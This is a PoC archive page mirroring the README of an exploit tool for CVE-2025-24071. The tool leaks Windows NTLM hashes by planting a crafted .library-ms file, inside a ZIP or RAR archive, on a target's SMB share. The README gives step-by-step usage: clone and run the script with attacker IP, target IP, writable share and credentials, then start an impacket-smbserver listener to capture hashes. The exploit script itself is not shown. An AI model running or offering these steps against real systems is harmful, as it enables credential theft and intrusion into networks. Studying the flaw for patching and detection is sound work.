Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24071 PoC — Microsoft Windows File Explorer 信息泄露漏洞

Source
Associated Vulnerability
Title:Microsoft Windows File Explorer 信息泄露漏洞 (CVE-2025-24071)
Description:Microsoft Windows File Explorer是美国微软(Microsoft)公司的一个文件管理器应用程序。 Microsoft Windows File Explorer存在信息泄露漏洞。攻击者利用该漏洞可以获取敏感信息。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server
Description
Windows File Explorer Spoofing Vulnerability - CVE-2025-24071
Readme
# CVE-2025-24071
Windows File Explorer Spoofing Vulnerability - CVE-2025-24071

Leak the NTLM hash of Windows through the extraction of a manipulated ZIP or RAR file, and by exploiting a vulnerability in the handling of .library-ms files (a type of file used by Windows to specify libraries and network connections).

## Affected version
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows Server 2025 (Server Core installation)
Windows Server 2025
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019

## Instalation:

```bash
git clone https://github.com/f4dee-backup/CVE-2025-24071
```

```bash
cd CVE-2025-24071
```
```bash
chmod +x CVE-2025-24071.sh
```
## Help Panel:
```
./CVE-2025-24071.sh -h
	-i) Your IP address
	-t) Target IP
	-d) A remote SMB share with write permissions (e.g.) C, ADMIN, IPC, SYSVOL, etc) 
	-u) Username
	-p) Password
	-h) Display this help panel
```
## Usage:
```bash
./CVE-2025-24071.sh -i "YOUR_IP" -t "TARGET_IP" -d "DIRECTORY_WRITE_REMOTE" -u "USER" -p "PASSWORD"
```

## Start the SMB server:
```bash
impacket-smbserver smbFolder $(pwd) -smb2support
```
File Snapshot

[4.0K] /data/pocs/6dda0eab8a5ea63fe8473471dabe6e6ad55d4056 ├── [4.4K] CVE-2025-24071.sh ├── [1.0K] LICENSE ├── [2.1K] README.md └── [ 31] requirements.txt 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.